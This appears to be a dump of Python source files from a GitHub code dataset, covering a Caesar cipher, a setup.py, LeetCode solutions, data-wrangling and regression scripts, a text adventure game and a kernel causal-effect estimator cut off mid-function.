88 \"8b, ,aa 88 \n `\"Ybbd8\"' 88 88`YbbdP\"' 88 88 `\"Ybbd8\"' 88 \n 88 \n 88 \n\"\"\"\n\n\ndef encode(message, shift):\n result = \"\"\n for char in message:\n if char.isalpha():\n if char.isupper():\n char = chr((ord(char)+shift - 65) % 26 + 65)\n else:\n char = chr((ord(char)+shift - 97) % 26 + 97)\n result += char\n else:\n result += char\n\n return result\n\n\ndef decode(message, shift):\n result = \"\"\n for char in message:\n if char.isalpha():\n if char.isupper():\n char = chr((ord(char)-shift - 65) % 26 + 65)\n else:\n char = chr((ord(char)-shift - 97) % 26 + 97)\n result += char\n else:\n result += char\n\n return result\n\n\ndef main():\n print(logo)\n print(\"Would you like to encode or decode a message?\")\n choice = input(\"Enter 'e' to encode or 'd' to decode: \")\n\n try:\n if choice == 'e':\n message = input(\"Enter your message: \")\n shift = int(input(\"Enter the shift value: \"))\n print(\"Your encrypted message is - \")\n print(encode(message, shift))\n\n elif choice == 'd':\n message = input(\"Enter your encrypted message: \")\n shift = int(input(\"Enter the shift value: \"))\n print(\"Your decrypted text is - \")\n print(decode(message, shift))\n else:\n print(\"Please enter a valid choice.\")\n\n except:\n print(\"Please enter a valid choice.\")\n\n print(\"Would you like to go again?\")\n again = input(\"Enter 'y' to go again or 'n' to quit: \")\n try:\n if again == 'y':\n os.system('clear')\n main()\n elif again == 'n':\n os.system('clear')\n print(\"Goodbye\")\n else:\n print(\"Please enter a valid choice.\")\n except:\n print(\"Please enter a valid choice.\")\n\n\nmain()\n","repo_name":"sammybarman/100-Days-of-Python","sub_path":"Day8/caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6619076973","text":"\nimport os\nfrom setuptools import setup\n\ndef version(modfile):\n '''\n Parse version from module without importing or evaluating the code.\n The module should define a __version__ variable like __version__ = '2.0.1'.\n '''\n import re\n with open(modfile) as fh:\n for line in fh:\n m = re.search(r\"^__version__ = '([^']+)'$\", line)\n if m:\n return m.group(1)\n raise Exception('No __version__ string found in {fn}'.format(fn=modfile))\n\nsetup(\n name = 'fabvenv', # pypi project name\n version = version('fabvenv.py'),\n license = 'MIT',\n description = ('A fabric utility for creating remote virtual' +\n ' environments, and installing and updating packages.'),\n long_description = open(os.path.join(os.path.dirname(__file__), \n 'README.md')).read(),\n keywords = ('fabric virtualenv venv utility'),\n url = 'https://github.com/todddeluca/fabvenv',\n author = 'Todd Francis DeLuca',\n author_email = 'todddeluca@yahoo.com',\n classifiers = ['License :: OSI Approved :: MIT License',\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n ],\n py_modules = ['fabvenv'],\n)\n\n","repo_name":"todddeluca/fabvenv","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70461365266","text":"# ! /usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'CLH'\n\n'''\n526. Beautiful Arrangement\n Suppose you have N integers from 1 to N.\n We define a beautiful arrangement as an array that is constructed by these N numbers successfully\n if one of the following is true for the ith position (1 <= i <= N) in this array:\n (1) The number at the i-th position is divisible by i.\n (2) i is divisible by the number at the i-th position.\n Now given N, how many beautiful arrangements can you construct?\n'''\n\nclass Solution(object):\n def __init__(self):\n self.N = 0\n self.total_num = 0\n\n def backtrack(self, k):\n if k == self.N:\n self.total_num += 1\n else:\n k = k + 1\n for i in range(1, self.N+1):\n if i % k == 0 or k % i == 0:\n if self.visited[i] == 1:\n continue\n self.visited[i] = 1\n self.backtrack(k)\n self.visited[i] = 0\n if k == self.N:\n return\n\n def countArrangement(self, N):\n \"\"\"\n :type N: int\n :rtype: int\n \"\"\"\n self.N = N\n self.visited = [0]*(N+1)\n self.backtrack(0)\n return self.total_num\n\n\nif __name__ == \"__main__\":\n S = Solution()\n S.countArrangement(15)\n\n\n\n\n\n","repo_name":"clhchtcjj/Algorithm","sub_path":"backtrack/leetcode 526 Beautiful Arrangement.py","file_name":"leetcode 526 Beautiful Arrangement.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"20844639001","text":"import csv\nimport json\nfrom itertools import zip_longest\n\nwith open('../git_scraper/data/github-open-pr_data.json') as f:\n git_pr_data = json.load(f)\n\ngit_pr_url = [item.get('url') for item in git_pr_data]\ngit_pr_contents = [item.get('pr_contents')\n for item in git_pr_data]\ngit_pr_comments = [item.get('pr_comments')\n for item in git_pr_data]\ngit_pr_code = [item.get('pr_code') for item in git_pr_data]\ngit_pr_quotes = [item.get('pr_quotes') for item in git_pr_data]\ngit_pr_details = [item.get('pr_details') for item in git_pr_data]\ngit_pr_details_m = [item.get('pr_details_more') for item in git_pr_data]\ngit_pr_title = [item.get('pr_title') for item in git_pr_data]\ngit_pr_id = []\ngit_pr_battery = []\ngit_pr_energy = []\ngit_pr_sustain = []\ngit_pr_power = []\ngit_pr_green = []\ngit_pr_contents_new = []\ngit_pr_comments_new = []\ngit_pr_code_new = []\ngit_pr_quotes_new = []\ngit_pr_details_new = []\ngit_pr_details_m_new = []\n\ncollection_name = []\nraw_contents = []\n\nz = 28995\nfor i in range(len(git_pr_url)):\n y = \"GitPR\" + str(z)\n git_pr_id.append(y)\n z = z + 1\n\nfor i in range(len(git_pr_url)):\n collection_name.append(\"GitHubPRs\")\n\nfor contents in git_pr_contents:\n try:\n contents = ''.join(contents)\n git_pr_contents_new.append(contents)\n except TypeError:\n contents = ''\n git_pr_contents_new.append(contents)\n\nfor comments in git_pr_comments:\n try:\n comments = ''.join(comments)\n git_pr_comments_new.append(comments)\n except TypeError:\n comments = ''\n git_pr_comments_new.append(comments)\n\nfor code in git_pr_code:\n try:\n code = ''.join(code)\n git_pr_code_new.append(code)\n except TypeError:\n code = ''\n git_pr_code_new.append(code)\n\nfor quotes in git_pr_quotes:\n try:\n quotes = ''.join(quotes)\n git_pr_quotes_new.append(quotes)\n except TypeError:\n quotes = ''\n git_pr_quotes_new.append(quotes)\n\nfor details in git_pr_details:\n try:\n details = ''.join(details)\n git_pr_details_new.append(details)\n except TypeError:\n details = ''\n git_pr_details_new.append(details)\n\nfor details_m in git_pr_details_m:\n try:\n details_m = ''.join(details_m)\n git_pr_details_m_new.append(details_m)\n except TypeError:\n details_m = ''\n git_pr_details_m_new.append(details_m)\n\n\n# print(len(git_pr_url))\n# print(len(git_pr_title))\n# print(len(git_pr_contents_new))\n# print(len(git_pr_answer_new))\n# print(len(git_pr_qdetails_new))\n# print(len(git_pr_adetails_new))\n\nfor i in range(1031):\n rcontents = git_pr_contents_new[\n i] + '' + git_pr_code_new[i] + '' + git_pr_comments_new[i] + '' + git_pr_quotes_new[i] + '' + git_pr_details_new[i] + '' + git_pr_details_m_new[i]\n raw_contents.append(rcontents)\n\n# print(len(raw_contents))\n\nraw_contents_final = []\nfor rc in raw_contents:\n other_string = rc[0:90]\n raw_contents_final.append(other_string)\n\ngit_pr_list = [git_pr_id,\n git_pr_url,\n collection_name,\n git_pr_title,\n raw_contents_final\n ]\n\nexport_data = zip_longest(*git_pr_list, fillvalue='')\n\nwith open('data/energy_data.csv', 'a', newline='') as myfile:\n wr = csv.writer(myfile)\n wr.writerows(export_data)\nmyfile.close()\n","repo_name":"S2-group/msr-2021-robotics-green-architectural-tactics-replication-package","sub_path":"RQ1_data_software/phase1_data_collection/data_to_csv/git-prs_to_csv.py","file_name":"git-prs_to_csv.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32390947526","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport warnings\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report\n\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\ntrain=pd.read_csv('totalimplemented_randomized_full_dataset.csv', dtype={\"fullname\": object, \"campus\": object, \"city\": object, \"fall_term\": object,\n \"measure_name\": float, \"school_name\": object, \"ethcat\": object,\n \"total_number\": float, \"ceeb_id\": float, \"gpa\": float, \"status\": object})\ntrain.head()\n\ntrain.isnull()\n\n#sns.heatmap(train.isnull())\n#sns.countplot(x='gpa',hue='measure_name',data=train)\n#sns.heatmap(train.isnull(),yticklabels=False,cbar=False)\n\n# train.info()\n\ntrain.drop(['fullname', 'city', 'school_name', 'ceeb_id', 'status', 'ethcat', 'total_number'], axis=1, inplace=True)\n\ntrain.info()\n\ncampus = pd.get_dummies(train['campus'],drop_first=True)\nfall_term = pd.get_dummies(train['fall_term'],drop_first=True)\ntrain.drop(['campus', 'fall_term'], axis=1, inplace=True)\ntrain = pd.concat([train, campus, fall_term],axis=1)\n\n# train.info()\n\nX_train, X_test, y_train, y_test = train_test_split(train.drop('measure_name', axis=1),\n train['measure_name'], test_size=0.20,\n random_state=101)\n\nlogmodel = LogisticRegression()\nlogmodel.fit(X_train, y_train)\n\npredictions = logmodel.predict(X_test)\n\n\nprint(classification_report(y_test, predictions))\n","repo_name":"hannarakhsha/Machine-Learning","sub_path":"OCR-Project/LogRegImplementation.py","file_name":"LogRegImplementation.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22869439600","text":"from Room import Room\r\nfrom TextUI import TextUI\r\nfrom Player import Player\r\nfrom Recipe import Recipe\r\n\r\n\"\"\"\r\n This class is the main class of the \"Dark Recipe Adventure\" application. \r\n 'Dark Recipe Adventure' is a text based adventure game. Users \r\n can walk around some scenery, collect the material, and use . \r\n \r\n To play this game, create an instance of this class and call the \"play\"\r\n method.\r\n\r\n This main class creates and initialises all the others: it creates all\r\n rooms, creates all recipes, creates the parser and starts the game. \r\n It also evaluates and executes the commands that the parser returns.\r\n \r\n This game is adapted from the 'World of Zuul' by Michael Kolling\r\n and David J. Barnes. The original was written in Java and has been\r\n simplified and converted to Python by Kingsley Sage\r\n\"\"\"\r\nclass Game:\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Initialises the game\r\n \"\"\"\r\n self.textUI = TextUI()\r\n self.player = Player()\r\n # self.createRecipes()\r\n self.myRecipe = {} # to store player's own recipes\r\n\r\n def createRecipes(self):\r\n \"\"\"set all recipes of game\"\"\"\r\n self.recipes = Recipe()\r\n self.recipes.setRecipe(('m1','m3','m9'),'r1_hot_fart_pot','has fart smell')\r\n self.recipes.setRecipe(('m2','m8'),'r2_rose_fish','can become a handsome fish')\r\n self.recipes.setRecipe(('m4','m5','m6'),'r3_stinky_durian_pizza','let\\'s hammer the durian')\r\n self.recipes.setRecipe(('m2','m6','m10'),'r4_banana_peel_juice','What does banana peel taste like')\r\n self.recipes.setRecipe(('m4','m7'),'r5_stinky_egg_fried_rice','flies around the food')\r\n self.recipes.setRecipe(('m1','m3','m5','m7','m10'),'r6_eyeball_meta','eyeball is expensive')\r\n self.recipes.setRecipe(('m6','m6','m8'),'r7_cactus_salad','full of thorns')\r\n self.recipes.setRecipe(('m7',),'r8_black_ice_cream','maybe made of oil')\r\n self.recipes.setRecipe(('m1','m2', 'm2', 'm9'),'r9_red_crab_burger','escaped from SpongeBob SquarePants')\r\n self.recipes.setRecipe(('m2','m5','m6','m6','m7'),'r10_onion_watermelon','chef\\'s special in university')\r\n self.recipes.setRecipe(('m5',), 'r11_chicken_shit', 'a chicken that looks like shit')\r\n self.recipes.setRecipe(('m2','m4','m6','m8','m10'), 'r12_canned_herring', 'famous for smelly')\r\n\r\n # def createPlayer(self):\r\n # self.player = Player()\r\n\r\n def createRooms(self):\r\n \"\"\"\r\n Sets up all room assets\r\n :return: None\r\n \"\"\"\r\n self.kitchen = Room(\"in Kitchen, wow a magic pot\")\r\n\r\n # initial location\r\n self.currentRoom = self.kitchen\r\n\r\n self.bridge = Room(\"on the Bridge\")\r\n self.l1 = Room(\"Land1\")\r\n self.l2 = Room(\"Land2\")\r\n self.l3 = Room(\"Land3\")\r\n self.l4 = Room(\"Land4\")\r\n self.l5 = Room(\"Land5\")\r\n self.tunnel = Room(\"in the sea Tunnel\")\r\n self.s1 = Room(\"Sea1\")\r\n self.s2 = Room(\"Sea2\")\r\n self.s3 = Room(\"Sea3\")\r\n self.s4 = Room(\"Sea4\")\r\n\r\n self.kitchen.setExit(\"east\", self.bridge)\r\n self.bridge.setExit(\"east\", self.l1)\r\n self.bridge.setExit(\"west\", self.kitchen)\r\n self.l1.setExit(\"east\", self.l2)\r\n self.l1.setExit(\"north\", self.l3)\r\n self.l1.setExit(\"west\", self.bridge)\r\n self.l2.setExit(\"west\", self.l1)\r\n self.l2.setExit(\"north\", self.l4)\r\n self.l2.setExit(\"south\", self.tunnel)\r\n self.l3.setExit(\"south\", self.l1)\r\n self.l3.setExit(\"east\", self.l4)\r\n self.l4.setExit(\"east\", self.l5)\r\n self.l4.setExit(\"south\", self.l2)\r\n self.l4.setExit(\"west\", self.l3)\r\n self.l5.setExit(\"west\", self.l4)\r\n self.tunnel.setExit(\"up\", self.l2)\r\n self.tunnel.setExit(\"down\", self.s1)\r\n self.s1.setExit(\"north\", self.tunnel)\r\n self.s1.setExit(\"south\", self.s3)\r\n self.s2.setExit(\"east\", self.s3)\r\n self.s3.setExit(\"west\", self.s2)\r\n self.s3.setExit(\"north\", self.s1)\r\n self.s3.setExit(\"east\", self.s4)\r\n self.s4.setExit(\"west\", self.s3)\r\n\r\n \"\"\"\r\n set items in specific rooms\r\n consider changing setItem(str) to setItem(list)\r\n \"\"\"\r\n # self.kitchen.setItem('pot')\r\n self.l1.setItem('m1')\r\n # self.l2.setItem('bonus scene')\r\n self.l3.setItem('m2')\r\n self.l3.setItem('m2')\r\n self.l4.setItem('m3')\r\n self.l5.setItem('m4')\r\n self.l5.setItem('m5')\r\n self.s1.setItem('m6')\r\n self.s1.setItem('m6')\r\n self.s1.setItem('m7')\r\n self.s2.setItem('m9')\r\n self.s2.setItem('m10')\r\n self.s3.setItem('m8')\r\n # self.s3.setItem('key')\r\n # self.s4.setItem('shift point')\r\n # self.s4.setItem('bonus scene')\r\n\r\n def play(self):\r\n \"\"\"\r\n The main play loop\r\n :return: None\r\n \"\"\"\r\n self.printWelcome()\r\n # prompt starting point\r\n self.textUI.printtoTextUI(self.currentRoom.getLongDescription())\r\n finished = False\r\n while (finished == False):\r\n command = self.textUI.getCommand() # Returns a 2-tuple\r\n finished = self.processCommand(command)\r\n\r\n print(\"Thank you for playing!\")\r\n\r\n def printWelcome(self):\r\n \"\"\"\r\n Displays a welcome message\r\n :return:\r\n \"\"\"\r\n self.textUI.printtoTextUI(\"A dark recipe space, around the magic complex, amazing materials.\")\r\n self.textUI.printtoTextUI(\"Mix materials in the pot to get your recipes.\")\r\n self.textUI.printtoTextUI(f'Your command words are: {self.showCommandWords()}')\r\n self.textUI.printtoTextUI(\"\")\r\n\r\n def showCommandWords(self):\r\n \"\"\"\r\n Show a list of available commands\r\n :return: None\r\n \"\"\"\r\n return ['help', 'go', 'kitchen', 'pick', 'drop', 'check', 'mix', 'quit']\r\n # help: describe playing ways (command)\r\n # go: type go [direction] , direction case sensitive\r\n # kitchen: shift to kitchen instantly\r\n # pick/drop material or key, materials case sensitive\r\n # mix: mix 1 to 5 material to create recipes, materials case sensitive\r\n # check: check the contents of backpack, the recipes created by player\r\n # quit: finish game\r\n\r\n def processCommand(self, command):\r\n \"\"\"\r\n Process a command from the TextUI\r\n :param command: a 2-tuple of the form (commandWord, secondWord)\r\n :return: True if the game has been quit, False otherwise\r\n \"\"\"\r\n # change: secondWord means other words\r\n commandWord, otherWords = command\r\n if commandWord != None:\r\n commandWord = commandWord.upper()\r\n\r\n wantToQuit = False\r\n if commandWord == \"HELP\":\r\n self.doPrintHelp()\r\n elif commandWord == \"GO\":\r\n self.doGoCommand(otherWords)\r\n elif commandWord == \"KITCHEN\":\r\n self.doKitchenCommand()\r\n elif commandWord == \"PICK\":\r\n self.doPickCommand(otherWords)\r\n elif commandWord == \"DROP\":\r\n self.doDropCommand(otherWords)\r\n elif commandWord == \"CHECK\":\r\n self.doCheckCommand()\r\n elif commandWord == \"MIX\":\r\n self.doMixCommand(otherWords)\r\n elif commandWord == \"QUIT\":\r\n wantToQuit = True\r\n else:\r\n # Unknown command ...\r\n self.textUI.printtoTextUI(\"Don't know what you mean\")\r\n\r\n return wantToQuit\r\n\r\n def doPrintHelp(self):\r\n \"\"\"\r\n Display some useful help text\r\n :return: None\r\n \"\"\"\r\n self.textUI.printtoTextUI(\"A dark recipe space, around the magic complex, amazing materials.\")\r\n self.textUI.printtoTextUI(\"Mix materials in the pot to get your recipes.\")\r\n self.textUI.printtoTextUI(f'Your command words are: {self.showCommandWords()}')\r\n\r\n def doGoCommand(self, otherWords):\r\n \"\"\"\r\n Performs the GO command\r\n :param secondWord: the direction the player wishes to travel in\r\n :return: None\r\n \"\"\"\r\n # change: secondWord means other words\r\n if otherWords == None:\r\n # Missing second word ...\r\n self.textUI.printtoTextUI(\"Go where?\")\r\n return\r\n # getExit: function of class Room\r\n # nextRoom = self.currentRoom.getExit(otherWords[0].lower())\r\n # \"\"\".lower(): make direction input be lower case, case insensitive\"\"\"\r\n nextRoom = self.currentRoom.getExit(otherWords[0])\r\n if nextRoom == None:\r\n self.textUI.printtoTextUI(\"There is no door!\")\r\n else:\r\n self.currentRoom = nextRoom\r\n self.textUI.printtoTextUI(self.currentRoom.getLongDescription())\r\n\r\n def doKitchenCommand(self):\r\n self.currentRoom = self.kitchen\r\n self.textUI.printtoTextUI(self.currentRoom.getLongDescription())\r\n\r\n def doPickCommand(self, otherWords):\r\n \"\"\"\r\n Performs the PICK command\r\n :param otherWords: otherWords[0] is the item the player wishes to pick in backpack\r\n :return: None\r\n \"\"\"\r\n try:\r\n\r\n if self.player.checkPackSize() == False:\r\n raise FullPackError()\r\n # self.textUI.printtoTextUI(\"The backpack is full, need to drop items\")\r\n # return\r\n elif otherWords == None:\r\n # Missing second word ...\r\n raise MissPickItemError()\r\n # self.textUI.printtoTextUI(\"Pick what?\")\r\n # return\r\n elif otherWords[0] in self.currentRoom.getItems():\r\n self.player.pickItem(otherWords[0])\r\n self.currentRoom.removeItem(otherWords[0])\r\n return f'Success pick!', self.doCheckCommand()\r\n raise NotInRoomError()\r\n # else:\r\n # self.textUI.printtoTextUI(f'No {otherWords[0]} here')\r\n except FullPackError:\r\n self.textUI.printtoTextUI(\"The backpack is full, need to drop items\")\r\n return \"The backpack is full, need to drop items\"\r\n except MissPickItemError:\r\n self.textUI.printtoTextUI(\"Pick what?\")\r\n return \"Pick what?\"\r\n except NotInRoomError:\r\n self.textUI.printtoTextUI(f'No {otherWords[0]} here')\r\n return f'No {otherWords[0]} here'\r\n\r\n # if self.player.checkPackSize() == False:\r\n # raise (backpackFullError)\r\n # self.textUI.printtoTextUI(\"The backpack is full, need to drop items\")\r\n # return\r\n # elif otherWords == None:\r\n # # Missing second word ...\r\n # self.textUI.printtoTextUI(\"Pick what?\")\r\n # return\r\n # elif otherWords[0] in self.currentRoom.getItems():\r\n # self.player.pickItem(otherWords[0])\r\n # self.currentRoom.removeItem(otherWords[0])\r\n # self.doCheckCommand()\r\n # else:\r\n # self.textUI.printtoTextUI(f'No {otherWords[0]} here')\r\n\r\n def doDropCommand(self, otherWords):\r\n \"\"\"\r\n Performs the DROP command\r\n :param secondWord: the item the player wishes to drop out of backpack, throw in the current room\r\n :return: None\r\n \"\"\"\r\n try:\r\n if otherWords == None:\r\n # Missing second word ...\r\n raise MissDropItemError()\r\n # self.textUI.printtoTextUI(\"Drop what?\")\r\n # return\r\n elif otherWords[0] in self.player.backpack:\r\n self.player.dropItem(otherWords[0])\r\n self.currentRoom.addItem(otherWords[0])\r\n self.doCheckCommand()\r\n return f'Success drop!', self.doCheckCommand()\r\n raise NotInPackError()\r\n # else:\r\n # self.textUI.printtoTextUI(f'no {otherWords[0]} in backpack')\r\n except MissDropItemError:\r\n self.textUI.printtoTextUI(\"Drop what?\")\r\n return \"Drop what?\"\r\n except NotInPackError:\r\n self.textUI.printtoTextUI(f'no {otherWords[0]} in backpack')\r\n return f'no {otherWords[0]} in backpack'\r\n\r\n # if otherWords == None:\r\n # # Missing second word ...\r\n # self.textUI.printtoTextUI(\"Drop what?\")\r\n # return\r\n # elif otherWords[0] in self.player.backpack:\r\n # self.player.dropItem(otherWords[0])\r\n # self.currentRoom.addItem(otherWords[0])\r\n # self.doCheckCommand()\r\n # else:\r\n # self.textUI.printtoTextUI(f'no {otherWords[0]} in backpack')\r\n\r\n def doCheckCommand(self):\r\n '''check what contents in player's backpack'''\r\n contents = self.player.checkPack()\r\n self.textUI.printtoTextUI(contents)\r\n self.textUI.printtoTextUI(f'My recipes: {self.myRecipe}')\r\n return (f'{contents}',f'My recipes: {self.myRecipe}')\r\n\r\n def doMixCommand(self, otherWords):\r\n \"\"\"mix 1 to 5 materials, try to cook new recipes\"\"\"\r\n if self.currentRoom != self.kitchen:\r\n self.textUI.printtoTextUI(\"Need go to kitchen, can type 'kitchen' to shift\")\r\n return \"Need go to kitchen, can click bottom 'kitchen' button to shift\"\r\n elif otherWords == None:\r\n # Missing second word ...\r\n self.textUI.printtoTextUI(\"Mix what materials?\")\r\n return \"Mix what materials?\"\r\n for material in otherWords:\r\n for item in self.player.backpack:\r\n if material == item:\r\n break;\r\n else:\r\n self.textUI.printtoTextUI(f'No {material} in backpack')\r\n return f'No {material} in backpack'\r\n else:\r\n otherWords.sort() # meterials list\r\n materials = otherWords\r\n for recipeMat in list(self.recipes.getAllMaterials()): # recipes keys of dictionary\r\n recipeMatList = list(recipeMat)\r\n recipeMatList.sort()\r\n if materials == recipeMatList:\r\n self.myRecipe[recipeMat] = self.recipes.getProduct(recipeMat)\r\n self.textUI.printtoTextUI(f'Successfully get {self.myRecipe[recipeMat]}!')\r\n self.textUI.printtoTextUI(f'you can continue play or quit')\r\n \"\"\"remove used materials form backpack\"\"\"\r\n while materials:\r\n self.player.dropItem(materials.pop())\r\n return f'Successfully get {self.myRecipe[recipeMat]}!\\n'\\\r\n f'you can continue play or quit'\r\n else:\r\n self.textUI.printtoTextUI(f'No recipe cooked, please try again~')\r\n return f'No recipe cooked, please try again~'\r\n\r\nclass FullPackError(Exception):\r\n def __init__(self):\r\n pass\r\nclass MissPickItemError(Exception):\r\n def __init__(self):\r\n pass\r\nclass NotInRoomError(Exception):\r\n def __init__(self):\r\n pass\r\nclass MissDropItemError(Exception):\r\n def __init__(self):\r\n pass\r\nclass NotInPackError(Exception):\r\n def __init__(self):\r\n pass\r\n\r\ndef main():\r\n game = Game()\r\n game.createRooms()\r\n game.createRecipes()\r\n game.play()\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"scdow/Dark-recipe-adventure","sub_path":"DarkRecipeAdventure/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":15392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15656573125","text":"class Solution:\n def expand(self, S: str) -> List[str]:\n # clarify questions:\n # within each brace, are there duplicated letters? - no. list is fine \n # is it always single letter? - yes\n \n # recursive - each recursive call takes care of one position\n # if the current position is {, search for } and split by ,\n # for each element, call the remaining after } with updated prefix\n # if current position is not {, update the prefix\n # then recursively call the remaining string\n\n if S == '':\n return ['']\n words = []\n \n def breakBrace(prefix, resStr):\n if not resStr:\n if len(prefix) > 0:\n words.append(prefix)\n return\n if resStr[0] == '{':\n end = resStr.find('}')\n for element in resStr[1:end].split(','):\n breakBrace(prefix + element, resStr[end+1:])\n else:\n breakBrace(prefix + resStr[0], resStr[1:])\n \n breakBrace('', S)\n return sorted(words)\n\nsolution = Solution()\ntest1 = '{a,b,c}{e,d}'\ntest2 = '{}'\ntest3 = ''\ntest4= '{a,b}c{d,e}f'\nprint(solution.expand(test3))\n","repo_name":"doria112/SANDBOX","sub_path":"doria112/lc/1087_brace_expansion.py","file_name":"1087_brace_expansion.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42555900692","text":"import torch\nimport numpy as np\n\nfrom sklearn.gaussian_process import kernels\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics.pairwise import pairwise_kernels\n\ndef _alpha_func(pi, lambda_):\n return 1 / (lambda_ * pi) + 1 - 1 / (lambda_)\n\n\ndef _beta_func(pi, lambda_):\n return lambda_ / (pi) + 1 - lambda_\n\n\nclass KernelRegressor:\n def __init__(\n self,\n initial_length_scale=1.0,\n propensity_model=None,\n verbose=False,\n ):\n self.kernel = kernels.RBF(length_scale=initial_length_scale)\n if propensity_model is None:\n self.propensity_model = LogisticRegression()\n else:\n self.propensity_model = propensity_model\n\n self._gamma = None\n self.alpha_0 = None\n self.alpha_1 = None\n self.beta_0 = None\n self.beta_1 = None\n self.verbose = verbose\n\n def fit(self, X, A, Y):\n idx = np.argsort(Y.ravel())\n self.x = X[idx]\n self.t = A[idx].reshape(-1, 1)\n self.y = Y[idx].reshape(-1, 1)\n self.s = self.y.std()\n self.m = self.y.mean()\n self.propensity_model.fit(self.x, self.t.ravel())\n self.e = self.propensity_model.predict_proba(self.x)[:, -1:]\n\n def predict(self, X, gamma):\n self._gamma = gamma\n self.alpha_0 = _alpha_func(pi=1 - self.e, lambda_=gamma)\n self.alpha_1 = _alpha_func(pi=self.e, lambda_=gamma)\n\n self.beta_0 = _beta_func(pi=1 - self.e, lambda_=gamma)\n self.beta_1 = _beta_func(pi=self.e, lambda_=gamma)\n\n k = self.k(X)\n\n lambda_top_1 = []\n lambda_top_0 = []\n lambda_bottom_1 = []\n lambda_bottom_0 = []\n for i in range(k.shape[0]):\n lambda_top_1.append(self.lambda_top_1(i, k).reshape(1, -1))\n lambda_top_0.append(self.lambda_top_0(i, k).reshape(1, -1))\n lambda_bottom_1.append(self.lambda_bottom_1(i, k).reshape(1, -1))\n lambda_bottom_0.append(self.lambda_bottom_0(i, k).reshape(1, -1))\n lambda_top_1 = np.vstack(lambda_top_1)\n lambda_top_0 = np.vstack(lambda_top_0)\n lambda_bottom_1 = np.vstack(lambda_bottom_1)\n lambda_bottom_0 = np.vstack(lambda_bottom_0)\n\n tau_top = []\n tau_bottom = []\n for i in range(k.shape[0]):\n tau_top.append(\n lambda_top_1[:, i : i + 1].max(axis=0)\n - lambda_bottom_0[:, i : i + 1].min(axis=0)\n )\n tau_bottom.append(\n lambda_bottom_1[:, i : i + 1].min(axis=0)\n - lambda_top_0[:, i : i + 1].max(axis=0)\n )\n tau_top = np.stack(tau_top)\n tau_bottom = np.stack(tau_bottom)\n tau_mean = self.tau(k=k)\n return tau_mean, tau_bottom, tau_top\n\n def k(self, x):\n return pairwise_kernels(\n self.embed(x), self.embed(self.x), metric=self.kernel, filter_params=True\n )\n\n def mu0_w(self, w, k):\n return np.matmul(k, (1 - self.t) * self.y * w) / (\n np.matmul(k, (1 - self.t) * w) + 1e-7\n )\n\n def mu1_w(self, w, k):\n return np.matmul(k, self.t * self.y * w) / (np.matmul(k, self.t * w) + 1e-7)\n\n def lambda_top_0(self, u, k):\n t = 1 - self.t\n alpha = np.matmul(k[:, :u], t[:u] * self.alpha_0[:u])\n beta = np.matmul(k[:, u:], t[u:] * self.beta_0[u:])\n alpha_y = np.matmul(k[:, :u], t[:u] * self.alpha_0[:u] * self.y[:u])\n beta_y = np.matmul(k[:, u:], t[u:] * self.beta_0[u:] * self.y[u:])\n return (alpha_y + beta_y) / (alpha + beta)\n\n def lambda_top_1(self, u, k):\n t = self.t\n alpha = np.matmul(k[:, :u], t[:u] * self.alpha_1[:u])\n beta = np.matmul(k[:, u:], t[u:] * self.beta_1[u:])\n alpha_y = np.matmul(k[:, :u], t[:u] * self.alpha_1[:u] * self.y[:u])\n beta_y = np.matmul(k[:, u:], t[u:] * self.beta_1[u:] * self.y[u:])\n return (alpha_y + beta_y) / (alpha + beta)\n\n def lambda_bottom_0(self, u, k):\n t = 1 - self.t\n alpha = np.matmul(k[:, u:], t[u:] * self.alpha_0[u:])\n beta = np.matmul(k[:, :u], t[:u] * self.beta_0[:u])\n alpha_y = np.matmul(k[:, u:], t[u:] * self.alpha_0[u:] * self.y[u:])\n beta_y = np.matmul(k[:, :u], t[:u] * self.beta_0[:u] * self.y[:u])\n return (alpha_y + beta_y) / (alpha + beta)\n\n def lambda_bottom_1(self, u, k):\n t = self.t\n alpha = np.matmul(k[:, u:], t[u:] * self.alpha_1[u:])\n beta = np.matmul(k[:, :u], t[:u] * self.beta_1[:u])\n alpha_y = np.matmul(k[:, u:], t[u:] * self.alpha_1[u:] * self.y[u:])\n beta_y = np.matmul(k[:, :u], t[:u] * self.beta_1[:u] * self.y[:u])\n return (alpha_y + beta_y) / (alpha + beta)\n\n def mu0(self, k):\n return self.mu0_w(w=(1 - self.e) ** -1, k=k)\n\n def mu1(self, k):\n return self.mu1_w(w=self.e ** -1, k=k)\n\n def tau(self, k):\n return self.mu1(k) - self.mu0(k)\n\n def fit_length_scale(self, dataset, grid):\n best_err = np.inf\n best_h = None\n count = 0\n for h in grid:\n kernel = kernels.RBF(length_scale=h)\n k = pairwise_kernels(\n self.embed(dataset.x),\n self.embed(self.x),\n metric=kernel,\n filter_params=False,\n )\n mu0 = self.mu0(k)\n mu1 = self.mu1(k)\n y = dataset.y.reshape(-1, 